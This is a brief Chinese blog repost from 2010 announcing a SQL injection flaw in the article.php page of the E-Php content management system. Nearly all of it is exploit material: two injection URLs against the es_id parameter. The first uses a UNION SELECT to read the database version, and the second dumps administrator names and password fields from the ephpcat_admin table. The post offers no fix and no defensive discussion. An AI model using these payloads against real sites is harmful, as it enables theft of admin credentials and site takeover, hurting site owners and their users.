【转载】E-Php内容管理系统sql注射漏洞利用

2010-11-10

老系统内容 PHP SQL 管理管理系统漏洞系统注射转载

约 75 字预计阅读 1 分钟

文章目录

E-Php 内容管理系统 SQL 注射漏洞利用：

E-Php 内容管理系统，E-Php Content Management System （CMS），article.php 页面存在 SQL 注射漏洞。

漏洞测试：Exploit

http://127.0.0.1/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12

http://127.0.0.1/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin

文章作者 Nuclear'Atk

上次更新 2010-11-10